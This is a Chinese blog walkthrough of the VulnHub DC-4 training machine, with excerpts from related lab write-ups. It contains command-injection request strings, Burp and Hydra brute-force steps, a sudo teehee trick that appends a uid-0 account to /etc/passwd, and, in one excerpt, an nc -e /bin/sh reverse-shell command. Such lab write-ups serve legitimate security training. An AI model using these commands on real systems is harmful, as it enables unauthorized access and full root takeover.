vulnhub-dc4

已于 2022-10-06 14:23:09 修改
阅读量1.2k 收藏
点赞数
分类专栏: vulhub 文章标签: web安全 安全
于 2022-10-05 20:35:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_55654781/article/details/127176553
版权

靶机地址

dc4链接:https://www.vulnhub.com/entry/dc-4,313/

打开靶机,设置为同一种nat模式

kali 信息收集主机发现

arp-scan -l

扫描ip端口,开放80,22端口访问网址

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cWVtaxH7-1664973268732)()]

burp 抓取数据包,进行爆破采用cluster bomb模块,添加字典1和字典2 账号密码(admin happy)

点击command,发现三条命令

burp抓包修改命令

radio=cat+/etc/passwd&submit=Run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xxJHSMQt-1664973268736)(http://angus.gq/dc-4/4.png)]

发现三个用户,在charles用户下没有看到有用信息,切换到jim用户查看

radio=ls+-al+/home/jim&submit=Run

查看back目录下有old-passwords.bak

查看old-passwords.bak

利用hydra对三个用户进行ssh爆破,将三个用户名写入users.txt,密码写入passwd.txt

ssh登录jim账号

查看邮件,在cd /var/mail

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W9LRkPi4-1665037339626)(http://angus.gq/dc-4/10.png#pic_center)]

如图可以知道Charles密码,切换用户,使用teehee命令

利用mkpasswd来生成密码

使用teehee来添加一个管理员用户到passwd文件里

sudo teehee -a /etc/passwd
test:$6$oBLtCRtnRR5VK/G6$.fgFjk6qyj2nO/Cc/V54BD64KTGP3gGUbn3fYCO3aR7vP749qAwK42yKouue05pahfBJey44JKqA..bIy32P0.:0:0:/root/root:/bin/bash

查看文件/etc/passwd

切换用户test

在cd /root/flag.txt

teehee命令解释
teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权
linux中普通用户能临时使用root权限的命令,查看方式:

sudo -l

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

echo "raaj::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户,这个用户因为uid为0,所以也是root权限。

参考链接

https://blog.youkuaiyun.com/m0_62008601/article/details/124686217

vulnhub---DC-4靶机
qq_43168364的博客
08-21 2102
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub-DC 7-9 提权、端口敲门
2301_80115097的博客
04-28 1221
Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com下载地址:https://www.vulnhub.com/entry/dc-8,367/直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本);
vulnhub-DC4
weixin_55129870的博客
05-16 158
kaliip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC4ip: 192.168.44.144 端口扫描 nmap -A -p1-65535 -T4 192.168.44.144 开放80、22端口,对应http,ssh服务 访问http服务 指纹识别 whatweb http://192.168.44.144 得知,web服务器为nginx 1.15.10 爆破吧,猜测用户名为admin,使用kali的/.
Vulnhub靶机 DC-4
菜浪马废的博客
03-23 505
信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口,访问一下页面 是个登录页面,而且可以用爆破来登录,没有验证机制 安装pydictor,一个字典生成工具,用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1231
vulnhubdc-4详细步骤
vulnhubdc4
qq_54030686的博客
06-09 610
参考官方文档进行操作 这个靶场和其他的靶场还是有一些区别的,简单描述的话,就是拐弯抹角了,不会直接让你进行提权的操作,这篇官方文档中的有些观点,个人感觉有一些问题主机发现 目标IP为192.16843.138,攻击IP为192.168.43.128 进行端口扫描 目标存在22 ssh端口 80 http端口,话不多说,ssh爆破,掏出top100 未成功爆破,从http(80)端口下手,指纹识别 未识别到相关框架 只存在一个登录框,并且为明文传输,话不多说,掏出破解版bp和top1000,破解版跑的快,
Vulnhub - DC-1
qq_46081990的博客
03-14 489
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub靶场 | DC系列 - DC4
哦 卷!
08-31 1025
teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户。爆破出来的用户名为admin,密码为happy,成功登录(也许这里真的是需要爆破来突破)。查看邮件jim,是charles发来的一封邮件,告诉了jim密码:^xHhA&hvim0y。查看了下,charles、sam的家目录下没有什么东西。有邮件,说明该系统时候邮件系统的,查看一下邮件。看一下jim的sudo授权,并没有可利用的~看一下mbox,有权限查看,是一封邮件。jim家目录下有两个文件,一个目录。
靶机渗透-Vulnhub-DC-2
dahege666的博客
01-21 411
下载地址: 1、链接:https://pan.baidu.com/s/1cl5-9SrevaFehfS4lY4w5w 提取码:7ahw 2、http://www.five86.com/downloads/DC-2.zip 3、https://download.vulnhub.com/dc/DC-2.zip 靶机:DC2(VMware桥接) IP:192.168.88.123 攻击机:Kali(VMware桥接) IP:192.168..88.109 测试之前需要修改一下hos...
VulnHub系列】DC4
大方子
04-09 742
https://note.youdao.com/s/FdSgf6NE
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1860
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub DC-4
Pai_Space
02-17 652
描述: 只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...
Vulnhub渗透测试靶机DC-4
weixin_46128614的博客
01-19 531
下载地址:https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口 直接访问80端口 只有一个认证框 没有验证 bp爆破admin弱密码 发现密码admin qwert 进入后台 发现有执行命令的地方 抓包发现命令由post包传过去 执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...
vulnhubDC4靶机
LainWith的博客
08-15 1273
靶机概览信息收集nmap信息收集爆破后台使用字典爆破登进后台命令注入漏洞敏感信息收集SSH爆破SSH登录提权创建一个管理员以管理员身份登录 靶机概览 详情介绍请参考下载地址 任务目标:拿下系统的root账户 下载地址:https://www.vulnhub.com/entry/dc-4,313/ 靶机界面: 信息收集 由于我这里采用了NAT,所以很容易确定目标机器,如果你的网络环境里有众多机器,并且系统版本与靶机相似,且不方便更换连接虚拟机的方式,你可以先查看一下DC3的MAC,这样做主机发现时可以通过.
VulnHub DC: 4
spider的博客
12-01 286
下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手(靶机在192.168.1.106) nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80,22端口。 先上个80看看 只有一个登陆界面,尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...
vulnhub系列靶机--DC4
cyzCc的博客
02-23 851
vulnhub系列靶机–DC4 1.使用nmap扫描主机ip nmap -sP 192.168.211.1/24 目标靶机的ip为192.168.211.137 2.扫描目标靶机开放的端口服务 nmap -A 192.168.211.137 -p 1-65535 目标靶机开放了22端口和80端口 我们在浏览器上访问80端口 发现一个admin登录框 尝试使用burp爆破,首先找到kali里面...
Vulnhub靶机渗透之DC4
2301_77039831的博客
07-30 929
‌在某些情况下,‌如果当前用户具有对某个文件的写权限,‌并且可以通过sudo命令以root权限运行tee命令,‌那么就可以利用这个特性来修改系统文件,‌从而实现提权。由于获取shell终端的用户是www用户,权限非常低,所以我们先看看都有什么东西,首先先看看都有哪些用户。发现数据跟预想的一样,命令是明文传输的,这时候我们就可以修改radio传递的参数来实现命令执行。发现是一个密码本,应该是jim用户的密码,保存到kali,然后用hydra爆破试一下。登录发现是查看磁盘文件的页面,于是试试命令执行漏洞。
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4883
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
vulnhub--DC4
baiyexing8的博客
10-14 120
看样子应该要bp爆破密码,网上搜了一下,在kali的/usr/share/john/password.lst里面存在一些适合爆破的密码,可以把它当作bp字典。发现无法使用sudo命令,接下来就没有思路了,看了其他师傅的wp才知道线索在/var/mail里。加上前面nmap扫到的ssh端口,让我们联想到了刷dc-2的时候用过的hydra爆破。发现/usr/bin/teehee可以使用root权限,使用teehee提权。有个command,点进去发现能查询一些用户信息,尝试用bp截获修改。
vulnhub靶机DC-1
最新发布
02-08
### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集 在启动DC-1之后,通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测 一旦确认存在Web服务运行于特定IP地址之上,则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作: ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞,并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限 当已经掌握了某些关于网站后台管理账号线索后(比如默认用户名),可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆;实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别 成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权,在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如,如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户,都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值